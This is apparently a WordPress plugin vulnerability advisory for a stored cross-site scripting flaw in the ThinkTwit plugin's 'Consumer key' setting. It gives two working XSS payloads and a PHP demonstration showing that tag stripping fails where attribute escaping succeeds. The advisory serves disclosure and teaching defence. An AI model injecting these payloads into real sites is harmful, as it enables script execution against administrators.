The plugin did not sanitise or escape its "Consumer key" setting before outputting it in its settings page, leading to a Stored Cross-Site Scripting issue.
Put the following payload in the "Consumer key" setting of the plugin (/wp-admin/options-general.php?page=thinktwit):
- v < 1.6.7 : "><script>alert(/XSS/)</script>
- v < 1.7.1 : " style=animation-name:rotation onanimationstart=alert(/XSS/)//
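Added example (not the plugin's code): the two payloads above rendered into a double-quoted value attribute three ways, showing why removing tags does not stop the second payload while escaping for the attribute context stops both. The field name and renderers are hypothetical, tag stripping is an assumed stand-in for an incomplete fix (the advisory does not say what 1.6.7 changed), and htmlspecialchars() is used where WordPress code would call esc_attr().

```php
<?php
// Added example, stand-alone PHP 7.4+ (needs ext-dom); not the plugin's code.
// Function names and the field name "consumer_key" are hypothetical.

// Payloads quoted from the proof of concept above.
$payloads = [
    'v < 1.6.7' => '"><script>alert(/XSS/)</script>',
    'v < 1.7.1' => '" style=animation-name:rotation onanimationstart=alert(/XSS/)//',
];

// Wrap an already-prepared value in the double-quoted attribute of a settings field.
function field(string $value): string {
    return '<input type="text" name="consumer_key" value="' . $value . '">';
}

$renderers = [
    // Vulnerable: stored value echoed as-is.
    'raw' => fn(string $v): string => field($v),
    // Assumed incomplete fix: tags removed, but the quote still ends the attribute.
    'strip_tags' => fn(string $v): string => field(strip_tags($v)),
    // Hardened: escaped for the attribute context at output time.
    'escaped' => fn(string $v): string => field(htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')),
];

// Parse the markup with an HTML parser and report what the stored value turned into.
function inspect(string $html): array {
    libxml_use_internal_errors(true); // malformed markup is expected here
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    $attrs = [];
    foreach ($input->attributes as $attr) {
        $attrs[] = $attr->nodeName;
    }
    return [
        'attrs'  => implode(',', $attrs),
        'script' => $doc->getElementsByTagName('script')->length > 0 ? 'yes' : 'no',
        'value'  => $input->getAttribute('value'),
    ];
}

foreach ($payloads as $version => $payload) {
    foreach ($renderers as $name => $render) {
        $r = inspect($render($payload));
        $intact = $r['value'] === $payload ? 'yes' : 'no';
        printf("%-10s %-11s attrs=%-40s script=%-3s value_intact=%s\n",
            $version, $name, $r['attrs'], $r['script'], $intact);
    }
}
```

A rendering is safe only when the attribute list stays at type,name,value, no script element appears, and the parsed value equals the stored string.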
Vinit Yashwantrao
Vinit Yashwantrao
Yes
2021-08-18 (about 9 months ago)
2021-08-18 (about 9 months ago)
2022-04-09 (about 1 month ago)